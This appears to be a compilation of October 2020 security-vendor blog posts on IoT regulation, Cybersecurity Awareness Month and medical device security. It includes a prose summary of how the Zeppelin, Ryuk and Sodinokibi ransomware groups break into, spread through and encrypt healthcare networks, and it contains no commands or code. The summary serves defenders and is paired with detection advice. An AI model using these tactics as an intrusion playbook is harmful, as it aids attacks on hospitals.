- Huawei Technologies Co.
- ZTE Corp.
- Hytera Communications Corp.
- Hangzhou Hikvision Digital Technology Co.
- Dahua Technology Co.
Month: October 2020
Internet of Things – Digital Transformation
Merriam-Webster’s definition of the Internet of Things (IoT) is, “the networking capability that allows information to be sent to and received from objects and devices (such as fixtures and kitchen appliances) using the Internet”. In 1999 Kevin Ashton coined the term and since then we have seen the expansive growth of IoT and while these devices have been around for decades, the regulations on these devices still remain ineffectual.
And, while IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025, we still are not able to properly build IoT devices with security in mind.
The United States
Recently, a bipartisan bill, the IoT Cybersecurity Improvement Act, from Reps. Will Hurd (R-Texas) and Robin Kelly (D-Ill.), along with Sens. Mark Warner (D-Va.) and Cory Gardner (R-Colo.) was passed by the House but now must go to the Senate before hitting the President’s desk. The bill took more than three years to get to the House of Representatives and in that time more than 6 billion IoT devices entered the market.
While the bill would set the minimum security standards for IoT devices connected to federal networks, it would also require the National Institute of Standards and Technology (NIST) to set best practices for device security, the Office of Management and Budget to create guidance for agencies to meet, and require the Department of Homeland Security to publish guidance on coordinated vulnerability disclosures for contractors and vendors.
The Food and Drug Administration (FDA) is trying to achieve medical device security and makes it well known on their website what they aim to accomplish:
The U.S. Food and Administration (FDA) regulates medical devices and works aggressively to reduce cybersecurity risks in what is a rapidly changing environment. It is a responsibility the Agency shares with device makers, hospitals, health care providers, patients, security researchers, and other government agencies, including the U.S. Department of Homeland Security and U.S. Department of Commerce.
The FDA provides guidance to help manufacturers design and maintain products that are cyber secure. And on behalf of patients, the FDA urges manufacturers to monitor and assess cybersecurity vulnerability risks, and to be proactive about disclosing vulnerabilities and solutions to address them.
The medical device cybersecurity guidance by the FDA was last updated in 2018. While they release a list of vulnerabilities, their guidance points organizations to the MITRE Corporation’s Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook in which they were a contributor.
Much like with regulatory compliance standards around sensitive data, in the United States the individual states are leading the charge again. California and Oregon have enacted legislation that mandates that manufactures that supply IoT devices do so with “reasonable security features.” In addition to California and Oregon, eight additional states are considering legislation.
The United States is likely to not see real meaningful regulatory compliance standards for IoT devices until the impact has already hit most organizations and homes. Compare that to the European Union (EU) and what they have in place and are working to put in place.
The European Union (EU)
The EU in June of this year introduced a new cybersecurity standard for consumer IoT (ETSI EN 303 645 V2.1.1) products. With the hopes of better security practices and more manufactures adopting a security-by-design principle when developing new connected consumer products.
The standard consists of 13 provisions:
- No universal default passwords
- Implement a means to manage reports of vulnerabilities
- Keep software updated
- Securely store sensitive security parameters
- Communicate securely
- Minimize exposed attack surfaces
- Ensure software integrity
- Ensure that personal data is secure
- Make systems resilient to outages
- Examine system telemetry data
- Make it easy for users to delete user data
- Make installation and maintenance of devices easy
- Validate input data
In addition to ETSI EN 303 645 V2.1.1, the EU also explicitly addresses medical devices in the European Medical Device Regulation (EU MDR). Much like the US FDA’s UDI, it seeks to ensure high standards of quality and safety for medical devices being produced in or supplied into Europe. With the introduction of this directive, devices entering the EU will have:
- Stricter pre-market control of high-risk devices at an EU level
- The inclusion of certain aesthetic products which present the same characteristics and risk profile as equivalent medical devices
- A new risk classification system for diagnostic medical devices based on international guidance
- Improved transparency through the establishment of a comprehensive EU database of medical devices
- Device traceability through the supply chain from its manufacturer through to the final user
- An EU-wide requirement for an ‘implant card’ to be provided to patients containing information about implanted medical devices
- the reinforcement of the rules on clinical data and clinical studies on devices
- Manufacturers to collect data about the real-life use of their devices
- Improved coordination between EU Member States
And, now with Brexit, what happens with the United Kingdom (UK) come December 31, 2020 and the IoT regulatory compliance standards? While the UK remains subject to EU law, it is no longer part of the EU’s political bodies or institutions. Will the Department for Digital, Culture, Media & Sport (DCMS) serve as the governing body for IoT device security?
The United Kingdom (UK)
In June of 2020 the UK DCMS addressed the need for cybersecurity as a fundamental instrument in the building of IoT devices, they are enacting a product assurance schema to mark approved IoT devices with an assurance label or kitemark that demonstrates that the product has undergone independent testing or a robust and accredited self-assessment process. The ultimate goal would be that consumers of IoT devices would purchase approved devices, rather than those that are not, and that retailers would only sell approved devices.
DCMS has been taking forward multiple initiatives to address the matter, including:
- Publishing the Code of Practice for Consumer IoT Security
- Committing to taking forward new legislation to mandate core aspects of the Code
- Leading the development of industry standard ETSI EN 303 645
“The UK Government looks forward to continuing to work with industry and all interested stakeholders to ensure that the UK is the safest place to be online.”
While the EU and UK continue to lead the charge in regulatory compliance standards to protect citizen and resident data, it is also years ahead of the US in addressing IoT device security. The fundamental issues still remain. Can we create a global culture where we put securing our data first, both from properly building IoT devices and then by holding device manufactures accountable in our procurement of devices?
Early in my career, a mentor of mine said, “you either participate in this [connected] world, or you don’t. There is no middle area.” We were discussing social applications and the volume of data that is shared both professionally (what tools your team uses) and personally (where you live, what you consume, your preferences, etc.). When I think back to that conversation, which I remember vividly as a turning point in how I view data, I am reminded that the same principle applies to the devices that carry sensitive data. Which, inevitably brings us to this week, where we focus on National Cybersecurity Awareness Month’s (NSCAM) theme of, “If You Connect It, Protect It”.
This week’s theme description:
If you connect it, protect it. The line between our online and offline lives is indistinguishable. This network of connections creates both opportunities and challenges for individuals and organizations across the globe. The first week of Cybersecurity Awareness Month will highlight the ways in which internet-connected devices have impacted our lives and will empower all users to own their role in security by taking steps to reduce their risks.
You Either Have [Connected] Devices, Or You Don’t
In full realization of the fact that not all devices are created with the same intent, all devices are created with the purpose of solving for a want or need. One thing that most devices are not created with is security-in-mind. Connect devices often come with default passwords that go unchanged, have outdated operating systems, and are sending data via insecure protocols. Whether is it a personal device (ie. cell phone, smart watch, etc.) or devices that you have in your office (ie. MRI machines, HVAC controls, workstations, etc.), they all must be accounted for, risks must be known, and high-risk and vulnerable devices must be secured properly.
Steps to securing your IoT devices:
- Have an accurate inventory of all connected devices – you can’t protect what you don’t know about, therefore security starts with granular visibility of all your devices. This is a challenge for organizations because these devices are sometimes offline, they connect via wired and wireless networks, and they are sometimes procured and managed by users outside the purview of security. Accurate asset inventory includes not only an understanding of details such as make, model, serial number and location, but also associated vulnerabilities and recalls.
- Understand how those devices are behaving – to secure IoT devices, you need to understand what “good behavior” looks like. This allows you to baseline what normal patterns of communications look like in your specific environment, so you can identify anomalous and malicious patterns such as C2 communications or abnormal RDP/SMB lateral movement.
- Automate the appropriate response for securing devices on your network – with a complete inventory and understanding of how the devices are behaving on your network, you can automation action to enforce proactive segmentation policies or trigger the appropriate workflows (CMMS, CMDB, IR, etc.)
This week’s theme, “If You Connect It, Protect It” fits well with the Ordr mission of protecting all connected devices and creating a safer network infrastructure. Recently, we began an IoT Discovery Program that allows you to:
- Gain high-fidelity visibility into devices that you may not know are in your network
- Understand risks including communication patterns and vulnerabilities
- Discover usage patterns for your devices
- Map these devices to your Layer 2 and Layer 3 architecture
- Identify appropriate segmentation policies to secure your devices
If you feel this program would be a good fit for your organization, register here: https://ordr.net/sensor/
Through the Cybersecurity Awareness month of October, we will be releasing a set of blogs to focus on weekly topics. Next Tuesday, catch our blog on “Securing Devices at Home and Work”.
Tactics, Techniques, Procedures and Recommendations of How to Triage
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus shifted from a holistic look at patient care, health outcomes, experience, revenue, and security to health outcomes. In addition, there has been a mass influx in connected devices deployed in facilities without the proper purview of IT and Security teams, leading to an incomplete asset inventory and clear visibility of how/where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers with complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on hack than an autonomous piece of malware propagating across the network. The operators facilitating the recent ransomware attacks are heavily incentivized to make sure their malware is extremely effective at propagating diverse networks. We have seen simple pieces of malware like trojan droppers install remote control functionality and backdoors which allow these ransomware operators to then get on to the healthcare network and then run tools like Cobalt Strike to privilege escalate themselves to admin. Once admin privileges have been granted, these ransomware operators begin turning off the malware detection and incident response programs on the infected devices. We’ve seen these operators use tools like Mimikatz to dump memory and gather local admin passwords or common user passwords on systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, we’ve seen these compromised local administrator accounts used to install and distribute the ransomware. We’ve also seen these attackers run PsExec and PowerShell scripts remotely by mounting remote shares (like IPC$ and C$) using the compromised credentials. If local or commonly utilized credentials cannot be gathered from initially infected host we’ve seen them pivot to other hosts, or use common exploits kits to propagate throughout the network. These operators are skilled and unfortunately most healthcare providers and healthcare delivery organizations are trivial to compromise once these ransomware operators are inside.
Healthcare organizations that have vulnerable services on the edge of their network get compromised easily by autonomous scripts that are constantly scanning the internet. Once compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks, and utilize common local administrator accounts on largely unpatched systems. It is common to find legacy and largely unsupported operating systems like Windows XP running on both workstations and critical medical devices which cannot be patched and are running vulnerable services like SMBv1 that are available to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Let’s discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group however very little is known about the operators. The initial infection code checks to make sure it will not infect machines located in Belorussia, Kazakhstan, Russian Federation, or Ukraine. The Zeppelin ransomware code is largely is based on a purchasable ransomware variant known as VegaLocker which is available on multiple hacking and ransomware as a service websites and forums. The initial infections of Zeppelin began in the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
- Typically, a spam or phishing email is received by an organization that includes an infected document that download and installs malware onto the system.
- Some initial infections appear to be Vidar Spyware or the CobaltStrike penetration tester toolkit.
- Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle Weblogic servers available on the internet.
- Once connected to the infected system the operators will install PowerShell scripts and PsExec.
- In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesn’t already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
- The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
- Typically, the Zepplin operators attempt to compromise the domain controller and once compromised they create a domain admin account to distribute the Zeppelin ransomware throughout the network.
- The domain admin account that is typically created is called “SQLSvc”.
- If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from memory of infected systems and propagate through file deployment and execution by PsExec.
- Once on the Domain Controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
- The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
- Finally, the scripts and Zeppelin ransomware is executed on all connected devices via PsExec.
The Ryuk (aka Conti) ransomware is known to be operated by Russian cybercrime group. The Ryuk ransomware was largely based on a previous ransomware codebase known as Hermes which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware as a service websites and forums. The Russian cybercrime group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
- A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
- The Ryuk operators gain access to the Emotet/TrickBot compromised machine typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
- Once on the infected system the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
- Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
- It is common for the Ryuk operators to utilize the PowerShell Empire post exploitation kit.
- The Ryuk operators dump the infected machines memory looking for local accounts that are used on Workstations and Servers throughout the network.
- If local credentials are not found, the operators will use common exploit kits.
- Lateral movement and infection happen either via RDP or through PsExec.
- Typically, the domain controller is initially targeted and if compromised the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
- Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon to be infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
- The Ryuk ransomware is deployed to all machines using PsExec and a local service is created and started to run the Ryuk binary.
- The Ryuk operators sometimes oversee the infection to ensure that it is successful and once infected they start emailing employees informing them of the infection and to reach out to them via an anonymous email where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April of 2019 and is believed to be created and operated most likely by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have hired affiliate hackers with a guaranteed payment of $50,000 USD and between 60% to 70% cut of the revenue after payments were secured from victims. The developers of this ransomware regularly post updates and new functionality to their code. Once installed, Sodinokibi ransomware initially looks for the computers language settings and will not infect if the set language is used in most former Soviet Union or Middle Eastern countries. The Sodinokibi ransomware has been seen using several TTP’s including manual and automated drive-by compromises using spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
- It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
- The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
- After the initial infection the Sodinokibi operators drop various exploit and privilege escalations kits to laterally move throughout the network.
- Similar to Zeppelin the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
- Once infected with the Sodinokibi ransomware, the malicious binary deletes all file shadow copies on the infected system and disables recovery mode in order to ensure that the encrypted files could not be restored from a local backup.
- The Sodinokibi ransomware includes several persistence and Anti-Anti-Virus and Anti-Backup/Restore functionality making the installation easy. This functionality makes it more autonomous for the operators which is why we sometimes see Sodinokibi installed in simple drive by attacks on vulnerable internet facing servers and services.
One concerning tactic that most ransomware as a service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs typically hosted on the Dark Web. We’ve seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
Recommendations on using Ordr to Protect Against Ransomware
- Discover and identify your weak points
- Identify devices running legacy versions of Windows that are running SMBv1 (such as Windows XP and Windows 7) The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordr’s Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems Windows 7 (or older).
- Identify devices with known vulnerabilities as attackers will try to exploit them them. Use Ordr’s built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
- Identify high-risk and vulnerable devices that cannot be patched. Using Ordr integration with winRM, you can identify device operating systems and status of patches.
- Enable proactive segmentation
- Using Ordr, systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only sanctioned communications required for their functions.
- Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
- Monitor for Ransomware Indicators
- Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
- Alert on common exploits and known ransomware payload URLs used in lateral movement such as EternalBlue.
- Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
- Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and log off activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and identify any anomalous user accounts created within the network by threat actors
If you’ve already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in my blog here. Note that with ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at email@example.com. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
United States of America – National Cyber Security Awareness Month (NCSAM)
As the Fall weather starts and we begin to overindulge in pumpkin spice lattes and candy, another great seasonal reminder is presented, Cybersecurity Awareness Month! Started in 2004 by the National Cyber Security Division within the United States Department of Homeland Security and the nonprofit National Cyber Security Alliance the dedicated month aims to raise awareness about cybersecurity. The focus is both on how consumers can protect their data and how organizations can take steps to safeguard their infrastructure. Since 2004, we have seen a global adoption of Cybersecurity Awareness Month with Canada and the European Union (EU) joining the US.
European Union – European Cybersecurity Month (ECSM)
The ECSM is dedicated to promoting cybersecurity among citizens and organizations, and to providing up-to-date online security information through awareness raising and sharing of good practices. ‘Think Before U Click’ is the official motto of ECSM 2020.
Canada – Cyber Security Awareness Month (CSAM)
The Canadian CSAM is to inform the public of the importance of cyber security. This campaign is focused on helping all Canadians be more secure online, by being informed and knowing the simple steps to take to protect themselves, their families, their workplace, and their devices. The month is divided into two themes which highlight different aspects of cyber security, focusing on protecting devices.
October 2020 – If You Connect It, Protect It
As we embark on another October of bringing awareness to the importance of cybersecurity, this year’s theme is, “Do Your Part. #BeCyberSmart.” Encouraging individuals and organizations to do their part, stressing personal accountability and the importance of organizations taking proactive steps to enhance cybersecurity.
Through the month of October the emphasis will be on “If You Connect It, Protect It,” and we will be releasing a set of blogs to focus on the weekly topics, give tips on how to protect your connected devices, and what the future looks like:
October 6 (Week 1): If You Connect It, Protect It
October 13 (Week 2): Securing Devices at Home and Work
October 20 (Week 3): Securing Internet-Connected Devices in Healthcare
October 27 (Week 4): The Future of Connected Devices
For more information on what you need to know about IoT Security, we’ve created an IoT Knowledge Hub. To learn more about IoT Security, click here.
Listening to Part 1 of the Minnesota HIMSS webinar series Medical Device Security Overview for Healthcare Delivery Organizations with speakers Matt Dimino and Carrie Whysall from CynergisTek, I found the following to be useful information that you can apply to your organization’s security program development.
Medical Device Security Services
Medical devices have important functions and carry sensitive data, making them attractive cyber attack targets. As medical devices become increasingly connected to the internet they are becoming greater security risks. These devices are purchased and utilized by different departments within the organization and can lead to inaccurate asset inventories and unmanaged devices.
Attacks on medical devices can cause disruptions in patient care and possibly result in patient harm. Not only will this result in lower quality care for that patient, it will also affect organizations reputation, and bottom line.
IoT & IoMT Device Security Challenges
There are a variety of security challenges that come with securing medical devices, and each requires a different solution.
- Culture: There’s a disconnect between IT and Clinical Engineering teams. Each group has minimal experience and knowledge of the other’s work and capabilities.
- Legacy Systems: Many medical devices on networks today are running on outdated operating systems and are kept for long periods of time.
- Unable to Update: Medical devices are often difficult, if not impossible, to patch.
- Medical Device Ecosystem is Complex: The medical device ecosystem is very complex, with devices coming from multiple vendors and software platforms.
- Lack of Security Contracts: Many familiar IT security controls don’t apply to medical devices. Administrative and physical controls can be disruptive to patient care and operations.
- Lack of Tools: IT teams have limited tools that work well with medical devices and can scan inventories for vulnerabilities.
- Medical Devices are Proprietary: Medical devices are specialized; with different wireless requirements, hardware and software.
- Insufficient Visibility: Many medical device networks lack adequate visibility of their medical device inventory.
- Inventory Size: Hospital beds have about 10 to 15 connected medical devices per bed, and each device has an average of 6.2 vulnerabilities
Medical Device Security Components
Medical device security should be comprehensive, creating a security program in three stages ensures it will be implementable down the line.
- Risk Assessment: The first step in creating a program is assessing your current security practices. This includes reviewing the current security program practices, installing a passive network scanner, and creating a security risk classification guide. Organizations should also segment devices and decide what teams, whether it be IT or Clinical Engineering, will be remediating vulnerabilities and overseeing different devices.
- Program Development: Next, create a cybersecurity program through adding security practices to pre-existing device management practices. This includes continued surveillance over remediated devices and other assets, as well as standardized device assessment, configuration and incident procedures.
- Program Management: Sustained device management is necessary for medical organizations to stay secure. Assisting in medical device procurement and deployment, vulnerability reporting, and remediation planning should all be performed as part of program management.
How Ordr Can Help
Cynergistek highlighted a passive device scanner as a key tool to creating and automating a medical device security program. Ordr Systems Control Engine (SCE) is able to provide an accurate asset inventory, properly classify devices with granular detail needed for appropriate workflows, baseline and map device communications and enable micro-segmentation efforts.
The Ordr SCE gives organizations the power to enable visibility and security of their network-connected devices, with a simple and powerful solution to identify, classify, profile the behavior and risk and automate action for every network-connected device in the enterprise. To learn more about how Ordr can enable an effective IoT security strategy for your organization, request a free sensor.
Look for blog posts covering Part 2 and 3 of the Medical Device Security webinar series in the future. You can watch the full HIMSS webinar here.